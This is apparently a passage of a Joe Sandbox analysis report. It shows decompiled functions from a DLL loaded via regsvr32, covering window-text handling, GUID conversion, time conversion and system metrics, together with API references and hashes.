				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x1c)) = _t116;
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x20)) = 0x104;
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x3c)) =  *((intOrPtr*)(_t119 + 0xc));
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x24)) = _t102;
				_t103 = 0x40;
				 *( *((intOrPtr*)(_t118 + 0x74)) + 0x28) = _t103;
				 *( *((intOrPtr*)(_t118 + 0x74)) + 0x34) =  *( *((intOrPtr*)(_t118 + 0x74)) + 0x34) |  *(_t119 + 0x14) | 0x00080020;
				if(( *(_t119 + 0x14) & _t103) != 0) {
					_t92 =  *((intOrPtr*)(_t118 + 0x74));
					_t48 = _t92 + 0x34;
					 *_t48 =  *(_t92 + 0x34) & 0xff7fffff;
					_t129 =  *_t48;
				}
				_t82 = E1001E302(0, _t116, _t118, _t129);
				_t104 =  *((intOrPtr*)(_t118 + 0x74));
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 8)) =  *((intOrPtr*)(_t82 + 0xc));
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x44)) = E1003FF42;
				if( *((intOrPtr*)(_t119 - 0xac)) != 0) {
					E1000A0B7(0, _t104, _t116, _t118, _t119, _t116, 0x104,  *((intOrPtr*)(_t119 - 0xac)), 0xffffffff);
				}
				if( *((intOrPtr*)(_t119 - 0xa8)) != 0) {
					_t116 = _t118 + 0x7c;
					L100011E5(_t118 + 0x7c,  *((intOrPtr*)(_t119 - 0xa8)));
					_t88 = L100011F4(_t118 + 0x7c, 0);
					while(1) {
						_t89 = L1004CBA9(_t88, 0x7c);
						if(_t89 == 0) {
							break;
						}
						 *_t89 = 0;
						_t88 = _t89 + 1;
						__eflags = _t89 + 1;
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0xc)) =  *((intOrPtr*)(_t118 + 0x7c));
				}
				return E10047739(0, _t116, _t118);
			}

0x1003850f
0x1003850f
0x10038519
0x10038521
0x1003852a
0x10038534
0x10038539
0x1003853f
0x10038547
0x1003854a
0x10038550
0x10038558
0x1003855c
0x1003855e
0x1003856c
0x10038571
0x1003857b
0x10038581
0x1003858e
0x100385a0
0x100385a0
0x10038590
0x10038597
0x1003859e
0x00000000
0x00000000
0x1003859e
0x1003858e
0x100385aa
0x100385af
0x100385b1
0x100385b2
0x100385b5
0x100385b7
0x100385b7
0x100385c1
0x100385c6
0x100385cc
0x100385d4
0x100385db
0x100385e1
0x100385e7
0x100385ed
0x100385ef
0x100385f5
0x100385f7
0x100385ff
0x10038605
0x1003860f
0x10038618
0x10038620
0x10038621
0x1003862d
0x10038633
0x10038635
0x10038638
0x10038638
0x10038638
0x10038638
0x1003863f
0x1003864d
0x10038650
0x10038656
0x1003865d
0x1003866d
0x10038672
0x1003867b
0x10038683
0x10038688
0x10038690
0x1003869a
0x1003869d
0x100386a6
0x00000000
0x00000000
0x10038697
0x10038699
0x10038699
0x10038699
0x100386ae
0x100386ae
0x100386b8

APIs

__EH_prolog3_GS.LIBCMT ref: 10038519

Part of subcall function 1001B6E7: _memset.LIBCMT ref: 1001B6FE

_memset.LIBCMT ref: 1003856C
GetVersionExA.KERNEL32(?,00000000,00000000,00000018), ref: 10038581
_malloc.LIBCMT ref: 100385AA
_memset.LIBCMT ref: 100385C1

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: _memset$H_prolog3_Version_malloc
String ID:
API String ID: 1339555267-0
Opcode ID: 1422dff509074d4d1f73794e736090bdd5341f7153cd0141cfaf232a2483be12
Instruction ID: f295394b957d1c0ebfc845127732de9d50591da18fa0336fb8d5660b5ee4c552
Opcode Fuzzy Hash: 1422dff509074d4d1f73794e736090bdd5341f7153cd0141cfaf232a2483be12
Instruction Fuzzy Hash: BF515DB4900B45DFDB22CF64C981A9ABBE0FF09314F1146ADEA999B361C734E944CF11

Uniqueness

Uniqueness Score: -1.00%

Function 1002BE83 Relevance: 7.6, APIs: 5, Instructions: 108
windowthreadCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E1002BE83(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;

				_push(0x14);
				E1004764D(0x100901ae, __ebx, __edi, __esi);
				_t55 =  *((intOrPtr*)(_t68 + 0xc)) + 0x2cc;
				if(_t55 > 0xf) {
					L21:
					_t56 = 0;
				} else {
					switch( *((intOrPtr*)(( *(_t55 + 0x1002c043) & 0x000000ff) * 4 +  &M1002C01B))) {
						case 0:
							__eax =  *(__ebp + 0x10);
							 *__eax = 2;
							 *(__eax + 8) = 1;
							goto L4;
						case 1:
							_t59 =  *((intOrPtr*)(_t68 + 0x10));
							 *(_t59 + 8) =  *(_t59 + 8) | 0x0000ffff;
							goto L3;
						case 2:
							__esi =  *(__ebp + 0x10);
							__ecx =  *(__ebp + 8);
							 *__esi = 0xb;
							__eax = E1002C4F3( *(__ebp + 8));
							__eax =  ~__eax;
							asm("sbb eax, eax");
							 *(__esi + 8) = __ax;
							goto L4;
						case 3:
							__eax =  *(__ebp + 0x10);
							 *(__eax + 8) =  *(__eax + 8) & 0x00000000;
							L3:
							 *_t59 = 0xb;
							goto L4;
						case 4:
							__eax = E100184C0();
							__ecx = __ebp + 0xc;
							__eax = L1000140B(__ebp + 0xc, __eax);
							__ecx = __ebp + 0xc;
							 *(__ebp - 4) = 1;
							__eax = L10001276(__ebp + 0xc, 0xf1c0);
							goto L19;
						case 5:
							__esi =  *(__ebp + 0x10);
							 *__esi = 3;
							__eax = GetThreadLocale();
							 *(__esi + 8) = __eax;
							goto L4;
						case 6:
							__eflags =  *(__esi + 0x5c) - 0xffffffff;
							if(__eflags == 0) {
								_push( *(__esi + 0x20));
								__ecx = __ebp - 0x20;
								__eax = L1000CDFE(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
								 *(__esi + 0x20) = SendMessageA( *( *(__esi + 0x20) + 0x20), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x20) + 0x20));
								 *(__esi + 0x5c) = GetBkColor( *(__ebp - 0x18));
								__eax = GetTextColor( *(__ebp - 0x18));
								__ecx = __ebp - 0x20;
								 *(__esi + 0x60) = __eax;
								__eax = L1000CE52(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
							}
							__eflags = __edi - 0xfffffd43;
							__eax =  *(__ebp + 0x10);
							 *__eax = 3;
							if(__edi != 0xfffffd43) {
								__esi =  *(__esi + 0x60);
							} else {
								__esi =  *(__esi + 0x5c);
							}
							 *(__eax + 8) = __esi;
							goto L4;
						case 7:
							__eflags =  *(__esi + 0x64);
							if(__eflags != 0) {
								L15:
								__edi =  *(__ebp + 0x10);
								 *__edi = 9;
								__eax =  *(__esi + 0x64);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 4))();
								__eax =  *(__esi + 0x64);
								 *(__edi + 8) = __eax;
								goto L4;
							} else {
								__ecx =  *(__esi + 0x20);
								__eax = E1002B00E( *(__esi + 0x20));
								__ecx = __esi;
								__eax = E1002BD4A(__ebx, __esi, __edi, __esi, __eflags, __eax);
								__eflags =  *(__esi + 0x64);
								if( *(__esi + 0x64) == 0) {
									goto L21;
								} else {
									goto L15;
								}
							}
							goto L22;
						case 8:
							__eax = E100184C0();
							__ecx = __ebp + 0xc;
							__eax = L1000140B(__ebp + 0xc, __eax);
							_t44 = __ebp - 4;
							 *_t44 =  *(__ebp - 4) & 0x00000000;
							__eflags =  *_t44;
							L19:
							__esi =  *(__ebp + 0x10);
							__ecx = __ebp + 0xc;
							 *__esi = 8;
							__eax = L100147D9(__ebx, __ebp + 0xc, __edx, __edi, __esi);
							__ecx =  *(__ebp + 0xc);
							__ecx =  *(__ebp + 0xc) + 0xfffffff0;
							 *(__esi + 8) = __eax;
							__eax = L100013E3( *(__ebp + 0xc) + 0xfffffff0, __edx);
							L4:
							_t56 = 1;
							goto L22;
						case 9:
							goto L21;
					}
				}
				L22:
				return E10047725(_t56);
			}

0x1002be83
0x1002be8a
0x1002be94
0x1002be9d
0x1002c010
0x1002c010
0x1002bea3
0x1002beaa
0x00000000
0x1002bed0
0x1002bed3
0x1002bed8
0x00000000
0x00000000
0x1002beb1
0x1002beb4
0x00000000
0x00000000
0x1002bf84
0x1002bf87
0x1002bf8a
0x1002bf8f
0x1002bf94
0x1002bf96
0x1002bf98
0x00000000
0x00000000
0x1002bec6
0x1002bec9
0x1002beb9
0x1002beb9
0x00000000
0x00000000
0x1002bfec
0x1002bff2
0x1002bff5
0x1002bfff
0x1002c002
0x1002c009
0x00000000
0x00000000
0x1002bfa1
0x1002bfa4
0x1002bfa9
0x1002bfaf
0x00000000
0x00000000
0x1002bee0
0x1002bee4
0x1002bee6
0x1002bee9
0x1002beec
0x1002bf02
0x1002bf14
0x1002bf17
0x1002bf1d
0x1002bf20
0x1002bf23
0x1002bf23
0x1002bf28
0x1002bf2e
0x1002bf31
0x1002bf36
0x1002bf3d
0x1002bf38
0x1002bf38
0x1002bf38
0x1002bf40
0x00000000
0x00000000
0x1002bf48
0x1002bf4c
0x1002bf68
0x1002bf68
0x1002bf6b
0x1002bf70
0x1002bf73
0x1002bf75
0x1002bf76
0x1002bf79
0x1002bf7c
0x00000000
0x1002bf4e
0x1002bf4e
0x1002bf51
0x1002bf57
0x1002bf59
0x1002bf5e
0x1002bf62
0x00000000
0x00000000
0x00000000
0x00000000
0x1002bf62
0x00000000
0x00000000
0x1002bfb7
0x1002bfbd
0x1002bfc0
0x1002bfc5
0x1002bfc5
0x1002bfc5
0x1002bfc9
0x1002bfc9
0x1002bfcc
0x1002bfcf
0x1002bfd4
0x1002bfd9
0x1002bfdc
0x1002bfdf
0x1002bfe2
0x1002bebe
0x1002bec0
0x00000000
0x00000000
0x00000000
0x00000000
0x1002beaa
0x1002c012
0x1002c017

APIs

__EH_prolog3.LIBCMT ref: 1002BE8A
SendMessageA.USER32 ref: 1002BF02
GetBkColor.GDI32(?), ref: 1002BF0B
GetTextColor.GDI32(?), ref: 1002BF17
GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 1002BFA9

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Color$H_prolog3LocaleMessageSendTextThread
String ID:
API String ID: 187318432-0
Opcode ID: d22433670a3056a702978a9435578d9b71aa6b37bc2a414f49c1d96738fc2e7c
Instruction ID: 0c5270fe824628972eb2d5b37537cdc2cc1a572c30690f40372f275bdb27a436
Opcode Fuzzy Hash: d22433670a3056a702978a9435578d9b71aa6b37bc2a414f49c1d96738fc2e7c
Instruction Fuzzy Hash: 30416738400B0ADFDB20DFA4D88599EB7F0FF08314F618959F99A9B2A1D774A940DB50

Uniqueness

Uniqueness Score: -1.00%

Function 10025B8D Relevance: 7.6, APIs: 5, Instructions: 100
timeCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E10025B8D(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, long long __fp0) {
				void* _t67;
				void* _t90;
				intOrPtr _t93;
				struct HWND__* _t95;
				void* _t96;
				struct HWND__* _t98;
				long long _t102;

				_t102 = __fp0;
				_t91 = __edi;
				_t90 = __edx;
				_push(0x1c);
				E1004764D(0x1008fa4a, __ebx, __edi, __esi);
				_t95 =  *(_t96 + 8);
				_t98 = _t95;
				_t99 = _t98 == 0;
				if(_t98 == 0) {
					E1000A069(0, __ecx, __edi, _t95, _t99);
				}
				asm("fldz");
				 *((long long*)(_t96 - 0x18)) = _t102;
				 *((intOrPtr*)(_t96 - 0x10)) = 0;
				E1001F0AF(_t95,  *((intOrPtr*)(_t96 + 0xc)));
				E100176B3( *((intOrPtr*)(_t95 + 4)),  *((intOrPtr*)(_t96 + 0xc)), _t96 + 8);
				if(_t95->i == 0) {
					FileTimeToSystemTime( *(_t96 + 0x10), _t96 - 0x28);
					E10023C56(_t96 - 0x18, _t91, __eflags,  *(_t96 - 0x28) & 0x0000ffff,  *(_t96 - 0x26) & 0x0000ffff,  *(_t96 - 0x22) & 0x0000ffff,  *(_t96 - 0x20) & 0x0000ffff,  *(_t96 - 0x1e) & 0x0000ffff,  *(_t96 - 0x1c) & 0x0000ffff);
					_push(0x400);
					_push(0);
					_push(_t96 + 0x10);
					E10025850(0, _t96 - 0x18, _t91, _t95, __eflags);
					 *((intOrPtr*)(_t96 - 4)) = 1;
					E100219F5(_t96 - 0x18, _t90,  *(_t96 + 8),  *(_t96 + 0x10));
					_t83 =  *(_t96 + 0x10) + 0xfffffff0;
					__eflags =  *(_t96 + 0x10) + 0xfffffff0;
				} else {
					_t92 = GetWindowTextLengthA( *(_t96 + 8));
					L1000140B(_t96 + 0xc, E100184C0());
					_t12 = _t92 + 1; // 0x1
					 *((intOrPtr*)(_t96 - 4)) = 0;
					GetWindowTextA( *(_t96 + 8), E100103E6(_t96 + 0xc, _t60), _t12);
					E1000FED3(_t96 + 0xc, 0xffffffff);
					_t93 =  *((intOrPtr*)(_t96 + 0xc));
					_t67 = L10024CA8(_t96 - 0x18, _t90, _t102, _t93, 0, 0x400);
					_t101 = _t67;
					if(_t67 == 0) {
						_push(0xffffffff);
						_push(0);
						_push(0xf118);
						E1001B561(0, _t90, _t93, _t95, _t101);
						L1001ECE0(_t95);
					}
					_push(_t96 - 0x28);
					E10023C1F(_t96 - 0x28, _t96 - 0x18, _t90);
					SystemTimeToFileTime(_t96 - 0x28,  *(_t96 + 0x10));
					_t83 = _t93 - 0x10;
				}
				return E10047725(L100013E3(_t83, _t90));
			}

0x10025b8d
0x10025b8d
0x10025b8d
0x10025b8d
0x10025b94
0x10025b99
0x10025ba0
0x10025ba5
0x10025ba7
0x10025ba9
0x10025ba9
0x10025bae
0x10025bb5
0x10025bb8
0x10025bbb
0x10025bca
0x10025bd1
0x10025c63
0x10025c8a
0x10025c8f
0x10025c94
0x10025c98
0x10025c9c
0x10025ca4
0x10025cae
0x10025cb6
0x10025cb6
0x10025bd7
0x10025be0
0x10025beb
0x10025bf0
0x10025bf8
0x10025c04
0x10025c0f
0x10025c14
0x10025c21
0x10025c26
0x10025c28
0x10025c2a
0x10025c2c
0x10025c2d
0x10025c32
0x10025c39
0x10025c39
0x10025c41
0x10025c45
0x10025c51
0x10025c57
0x10025c57
0x10025cc3

APIs

__EH_prolog3.LIBCMT ref: 10025B94
GetWindowTextLengthA.USER32 ref: 10025BDA
GetWindowTextA.USER32(?,00000000,00000000), ref: 10025C04
SystemTimeToFileTime.KERNEL32(?,?,?,000000FF), ref: 10025C51

Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,0000001C), ref: 10025C63

Part of subcall function 10023C56: _memset.LIBCMT ref: 10023C67

Part of subcall function 10025850: __EH_prolog3.LIBCMT ref: 10025857

Part of subcall function 100219F5: lstrlenA.KERNEL32(1001F17A,?,?,00000000), ref: 10021A1F
Part of subcall function 100219F5: _memset.LIBCMT ref: 10021A3C
Part of subcall function 100219F5: GetWindowTextA.USER32(?,00000000,00000100), ref: 10021A56
Part of subcall function 100219F5: lstrcmpA.KERNEL32(00000000,1001F17A), ref: 10021A68
Part of subcall function 100219F5: SetWindowTextA.USER32(?,1001F17A), ref: 10021A74

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: TextTimeWindow$H_prolog3$FileSystem_memset$Exception@8LengthThrowlstrcmplstrlen
String ID:
API String ID: 3605897416-0
Opcode ID: 64716d980226eaca9e1eba3191ba87992bc159ea454a4b02de3db081957958aa
Instruction ID: a792ff8d2599d987b958d73a8b16588534a4e79e0e99e15e5fa06729617e6af3
Opcode Fuzzy Hash: 64716d980226eaca9e1eba3191ba87992bc159ea454a4b02de3db081957958aa
Instruction Fuzzy Hash: 56316C7940010AAFDF00DFA0DC819FE7779FF08351F508129FA11A6091EB35EA91DB64

Uniqueness

Uniqueness Score: -1.00%

Function 1004249E Relevance: 7.6, APIs: 5, Instructions: 99
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1004249E(void* __ecx, void* __eflags, intOrPtr _a8) {
				signed int _v8;
				struct tagRECT _v24;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t44;
				signed int _t48;
				signed int _t52;
				signed int _t57;
				void* _t64;
				signed int _t67;
				void* _t75;
				void* _t76;
				signed int _t78;
				void* _t80;

				_t80 = __eflags;
				_t75 = __ecx;
				_v8 = E100177F8(__ecx);
				GetWindowRect( *(__ecx + 0x20),  &_v24);
				_t67 = GetSystemMetrics(0x21);
				_t78 = GetSystemMetrics(0x20);
				_t76 = E10013F46(_t67, _t75, _t75, _t80);
				if((_v8 & 0x00001000) == 0) {
					L5:
					__eflags = _t76 - 0xa;
					if(_t76 < 0xa) {
						L7:
						__eflags = _t76 - 4;
						if(_t76 != 4) {
							L16:
							return _t76;
						}
						L8:
						__eflags = _v8 & 0x00000800;
						if((_v8 & 0x00000800) == 0) {
							InflateRect( &_v24,  ~_t78,  ~_t67);
							__eflags = _v8 & 0x00000200;
							if((_v8 & 0x00000200) == 0) {
								goto L16;
							}
							_t44 = _t76 - 4;
							__eflags = _t44;
							if(_t44 == 0) {
								L21:
								__eflags = _a8 - _v24.bottom;
								return 0xb + (0 | _a8 - _v24.bottom > 0x00000000) * 4;
							}
							_t48 = _t44 - 9;
							__eflags = _t48;
							if(_t48 == 0) {
								__eflags = _a8 - _v24.top;
								return (0 | _a8 - _v24.top < 0x00000000) + (0 | _a8 - _v24.top < 0x00000000) + 0xa;
							}
							_t52 = _t48 - 1;
							__eflags = _t52;
							if(_t52 == 0) {
								__eflags = _a8 - _v24.top;
								return (0 | _a8 - _v24.top < 0x00000000) + 0xb;
							}
							_t57 = _t52;
							__eflags = _t57;
							if(_t57 == 0) {
								__eflags = _a8 - _v24.bottom;
								return ((0 | _a8 - _v24.bottom <= 0x00000000) - 0x00000001 & 0x00000005) + 0xa;
							}
							__eflags = _t57 == 1;
							if(_t57 == 1) {
								goto L21;
							}
							goto L16;
						}
						_t64 = 2;
						return _t64;
					}
					__eflags = _t76 - 0x11;
					if(_t76 <= 0x11) {
						goto L8;
					}
					goto L7;
				}
				if(_t76 == 3) {
					_t76 = 2;
				}
				if(GetKeyState(2) >= 0) {
					goto L5;
				} else {
					return 0;
				}
			}

0x1004249e
0x100424a7
0x100424ae
0x100424b8
0x100424ca
0x100424d0
0x100424dd
0x100424df
0x100424fa
0x100424fa
0x100424fd
0x10042504
0x10042504
0x10042507
0x10042544
0x00000000
0x10042544
0x10042509
0x10042509
0x1004250f
0x10042520
0x10042526
0x1004252c
0x00000000
0x00000000
0x10042530
0x10042530
0x10042533
0x10042582
0x10042587
0x00000000
0x1004258d
0x10042535
0x10042535
0x10042538
0x10042576
0x00000000
0x1004257c
0x1004253a
0x1004253a
0x1004253b
0x10042566
0x00000000
0x1004256c
0x1004253e
0x1004253e
0x1004253f
0x10042552
0x00000000
0x1004255c
0x10042541
0x10042542
0x00000000
0x00000000
0x00000000
0x10042542
0x10042513
0x00000000
0x10042513
0x100424ff
0x10042502
0x00000000
0x00000000
0x00000000
0x10042502
0x100424e4
0x100424e8
0x100424e8
0x100424f4
0x00000000
0x100424f6
0x00000000
0x100424f6

APIs

Part of subcall function 100177F8: GetWindowLongA.USER32(?,000000F0), ref: 10017803

GetWindowRect.USER32 ref: 100424B8
GetSystemMetrics.USER32 ref: 100424C6
GetSystemMetrics.USER32 ref: 100424CC
GetKeyState.USER32(00000002), ref: 100424EB
InflateRect.USER32 ref: 10042520

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: MetricsRectSystemWindow$InflateLongState
String ID:
API String ID: 2406722796-0
Opcode ID: 2cd11d2c867d08c569cfb2d789efff36ef806e87dbca50b23167bba580d94d7d
Instruction ID: 95ef0437d9f863ab6c7eb43219b417ffc42352a2425f8ef67baea1a2dc3f029b
Opcode Fuzzy Hash: 2cd11d2c867d08c569cfb2d789efff36ef806e87dbca50b23167bba580d94d7d
Instruction Fuzzy Hash: 8921FB31B00919ABDB10EBB8CDA9BAEB7B9FF852D0FA14435D407DB091D570DD40C654

Uniqueness

Uniqueness Score: -1.00%

Function 100256D5 Relevance: 7.6, APIs: 5, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E100256D5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t28;
				void* _t37;
				void* _t39;
				intOrPtr _t49;
				intOrPtr _t54;
				void* _t55;
				intOrPtr* _t75;
				void* _t76;
				void* _t78;
				signed int _t81;
				void* _t83;

				_t73 = __edx;
				_t81 = _t83 - 0x7c;
				_t28 =  *0x100b9e70; // 0x6fb3f782
				 *(_t81 + 0x80) = _t28 ^ _t81;
				_push(0x70);
				E1004764D(0x1008f90e, __ebx, __edi, __esi);
				_t75 =  *((intOrPtr*)(_t81 + 0x8c));
				_t54 =  *((intOrPtr*)(_t81 + 0x94));
				E1001F0AF(_t75,  *((intOrPtr*)(_t81 + 0x90)));
				E100176B3( *((intOrPtr*)(_t75 + 4)),  *((intOrPtr*)(_t81 + 0x90)), _t81 - 0x10);
				_t87 =  *_t75;
				if( *_t75 == 0) {
					__imp__StringFromGUID2(_t54, _t81, 0x40);
					_push(_t81);
					_t37 = E10025504(_t54, _t81 - 0x7c, _t75, __esi, __eflags);
					 *(_t81 - 4) = 1;
					E100219F5(_t81 - 0x7c, __edx,  *(_t81 - 0x10),  *((intOrPtr*)(_t37 + 0xc)));
					_t39 = E100252BD(_t81 - 0x7c, __eflags);
				} else {
					_t79 = GetWindowTextLengthA( *(_t81 - 0x10));
					L1000140B(_t81 - 0x14, E100184C0());
					 *(_t81 - 4) =  *(_t81 - 4) & 0x00000000;
					_t13 = _t79 + 1; // 0x1
					GetWindowTextA( *(_t81 - 0x10), E100103E6(_t81 - 0x14, _t41), _t13);
					E1000FED3(_t81 - 0x14, 0xffffffff);
					_t80 =  *((intOrPtr*)(_t81 - 0x14));
					_t49 =  *((intOrPtr*)(E1000B9D2(_t54, _t81 - 0x18, _t75,  *((intOrPtr*)(_t81 - 0x14)), _t87)));
					__imp__CLSIDFromString(_t49, _t54,  *((intOrPtr*)(_t81 - 0x14)));
					_t56 = _t49;
					L100013E3( *((intOrPtr*)(_t81 - 0x18)) + 0xfffffff0, _t73);
					_t88 = _t49;
					if(_t49 < 0) {
						_push(0xffffffff);
						_push(0);
						_push(0xf11a);
						E1001B561(_t56, _t73, _t75, _t80, _t88);
						L1001ECE0(_t75);
					}
					_t39 = L100013E3(_t80 - 0x10, _t73);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t81 - 0xc));
				_pop(_t76);
				_pop(_t78);
				_pop(_t55);
				return E1004763E(_t39, _t55,  *(_t81 + 0x80) ^ _t81, _t73, _t76, _t78);
			}

0x100256d5
0x100256dc
0x100256e0
0x100256e7
0x100256ed
0x100256f4
0x100256f9
0x10025705
0x1002570d
0x1002571f
0x10025724
0x10025727
0x100257b8
0x100257c1
0x100257c5
0x100257cd
0x100257d7
0x100257df
0x1002572d
0x10025736
0x10025741
0x10025746
0x1002574a
0x1002575b
0x10025766
0x1002576b
0x10025777
0x1002577b
0x10025787
0x10025789
0x1002578e
0x10025790
0x10025792
0x10025794
0x10025796
0x1002579b
0x100257a2
0x100257a2
0x100257aa
0x100257aa
0x100257e7
0x100257ef
0x100257f0
0x100257f1
0x10025806

APIs

__EH_prolog3.LIBCMT ref: 100256F4

Part of subcall function 100176B3: GetDlgItem.USER32(?,?), ref: 100176C0

GetWindowTextLengthA.USER32 ref: 10025730
GetWindowTextA.USER32(?,00000000,00000000), ref: 1002575B

Part of subcall function 1000FED3: _strlen.LIBCMT ref: 1000FEE6

Part of subcall function 1000B9D2: __EH_prolog3.LIBCMT ref: 1000B9D9

CLSIDFromString.OLE32(?,?), ref: 1002577B

Part of subcall function 1001B561: __EH_prolog3.LIBCMT ref: 1001B568

Part of subcall function 1001ECE0: SetFocus.USER32 ref: 1001ED09
Part of subcall function 1001ECE0: SendMessageA.USER32 ref: 1001ED21

StringFromGUID2.OLE32(?,00000000,00000040), ref: 100257B8

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
